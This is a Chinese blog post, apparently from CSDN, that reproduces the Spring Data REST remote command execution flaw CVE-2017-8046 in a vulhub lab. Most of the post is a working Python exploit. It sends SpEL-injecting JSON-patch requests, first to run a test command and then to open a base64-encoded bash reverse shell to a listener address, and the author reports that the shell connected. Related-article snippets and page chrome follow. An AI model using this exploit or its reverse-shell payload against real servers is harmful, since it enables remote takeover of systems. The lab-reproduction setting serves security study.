CVE-2017-8046 Spring Data Rest 远程命令执行漏洞

最新推荐文章于 2023-09-17 14:50:13 发布
最新推荐文章于 2023-09-17 14:50:13 发布
阅读量1k 收藏
点赞数
文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45715461/article/details/126282872
版权

本文只要是学习poc、exp的编写,对于漏洞的原理不进行深入的介绍。

环境搭建

cd vulhub-master/spring/CVE-2017-8046
docker-compose up -d

image-20220811120142912

漏洞原理

漏洞的原因是对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为Spring的SPEL解析导致的RCE。

影响版本

  • Spring Data REST组件的2.6.9 and 3.0.9之前的版本(不包含2.6.9和3.0.9 )
  • Spring Boot (如果使用了Spring Data REST模块)的1.5.9 和 2.0 M6之前的版本

POC、EXP

import base64
import os
import requests
import json

header = {
    "Content-Type": "application/json-patch+json"
}
path = "/customers/1"

def poc(url):
    cmd = "touch /tmp/success"
    cmdUnicode = strToAscii(cmd)
    payload=f"{cmdUnicode}".replace("[", "{").replace("]", "}")

    data=[{
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
        "value": "vulhub"
    }]

    payloadData=json.dumps(data)
    html=requests.patch(url=url+path,headers=header,data=payloadData).text
    number = os.path.basename(__file__).split('.')[0]

    if html.find("EL1010E: Property")>0:
        outPocTrue(number, url, path)
    else:
        outPocFalse(number, url, path)

def exp(url,lhost,lport):
    cmd = bash(lhost,lport)
    cmdUnicode = strToAscii(cmd)
    payload = f"{cmdUnicode}".replace("[", "{").replace("]", "}")

    data = [{
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
        "value": "vulhub"
    }]

    payloadData = json.dumps(data)
    requests.patch(url=url + path, headers=header, data=payloadData).text

def true_url(url):
    if url[-1] == '/':
        url=url[0:-1]

    if url.find("http"):
        url = 'http://' + url
    return url

def bash(ip,port):
    m = f'bash -i >& /dev/tcp/{ip}/{port} 0>&1'
    s = str(base64.b64encode(m.encode('utf-8')), 'utf-8')
    bash_code = 'bash -c {echo,' + s + '}|{base64,-d}|{bash,-i}'
    return bash_code

def strToAscii(code):
    poc=[]
    for i in code:
        poc.append(ord(i))

    return poc

def outPocTrue(number,url,path):
    print(f"[+] The VULN {number} exists, path is : {url}{path}")

def outPocFalse(number,url,path):
    print(f"[-] The VULN {number} no exists")

    def bash64ToAscii(code):
        poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(code[0])
        for ch in code[1:]:
            poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
        poc += ')}'

        return poc

url= true_url("192.168.29.129:8080")
ip='192.168.29.135'
port='6666'

poc(url)
exp(url,ip,port)

运行之后,成功验证了漏洞的存在,并且成功反弹了shell

image-20220811115906450

image-20220811115923555

俺不想学习
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
一个有情怀的程序猿博客
06-30 1056
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越来越不受待见。 因此,我们有理由相信Spring引入SpEL必然增加安全风险。事实上,过去多个Spring CVE都与其..
Spring data rest漏洞在IDEA中复现CVE-2017-8046
wxzyyds的博客
11-06 1207
这篇文章主要讲述了spring data restCVE-2017-8046)由于spel表达式没有进行过滤而导致的远程RCE,本片文章利用了IDEA中的动态调试,实现了对于漏洞产生原因的详细复现
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
最新发布
精品博客,你值得一看~
09-17 607
REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
CVE-2017-8046 复现与分析
weixin_30715523的博客
07-28 286
环境搭建 使用的项目为https://github.com/spring-guides/gs-accessing-data-rest.git里面的complete,直接用IDEA导入,并修改pom.xml中版本信息为漏洞版本。这里改为1.5.6。 之前尝试搭建了另一个验证环境,但是修改版本后加载一直报错,不知道是什么原因,写完在研究下。 直接运行,默认端口8080,访问http://lo...
Spring Data Rest-远程命令执行漏洞CVE-2017-8046
qq_43381463的博客
04-11 448
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
m0_58596609的博客
04-22 1110
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
黑白的博客
12-20 1202
声明 好好学习,天天向上 漏洞描述 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 影响范围 pivotal Spring Data REST < 2.5.12 2.6.7 3.0 RC3 pivotal Spring Boot < 2.0.0M4 pivotal Sprin
vulhub中SpringCVE-2017-8046漏洞复现
weixin_41438728的博客
12-01 949
vulhub中SpringCVE-2017-8046漏洞复现Spring Data Rest 远程命令执行漏洞CVE-2017-8046漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 Spring Data Rest 远程命令执行漏洞CVE-2017-8046漏洞复现 漏洞说明 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),p
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3276
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
Spring Data Rest 远程命令执行漏洞复现CVE-2017-8046
来到了学渣的博客
11-09 380
环境搭建好后直接访问,漏洞页面如下 看到有/customers和/profile路径 访问请求会发现响应包有json传值 访问/customers和/profile路径 访问json请求中给的路径 构造poc http://www.jackson-t.ca/runtime-exec-payloads.html 先对想要执行命令进行编码然后转ascii码 转ascii直接写了个小脚本 ch=str(input("请输入一串字符:")) a=[] for i in ch: print(i,"
Spring Data Rest远程命令执行漏洞复现CVE-2017-8046
wutiangui的博客
09-10 374
Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。攻击者通过构造好的JSON数据来执行任意Java代码。将Content-Type指定为application/json-patch+json。使用python将准备执行的代码编码为十进制。访问以下链接,出现如下界面说明存在漏洞。1.准备shell命令。修改方法改为PATCH。
补丁patch 漏洞 bug或glitch
weixin_30369087的博客
09-28 180
补丁patch漏洞 bug或glitch 转载于:https://www.cnblogs.com/whoknows1/p/9717023.html
由patch请求方法引发的一些总结
热门推荐
胡小念
08-21 2万+
patch方法用来更新局部资源,这句话我们该如何理解? 假设我们有一个UserInfo,里面有userId, userName, userGender等10个字段。可你的编辑功能因为需求,在某个特别的页面里只能修改userName,这时候的更新怎么做? 人们通常(为徒省事)把一个包含了修改后userName的完整userInfo对象传给后端,做完整更新。但仔细想想,这种做法感觉有点二,而且真心...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值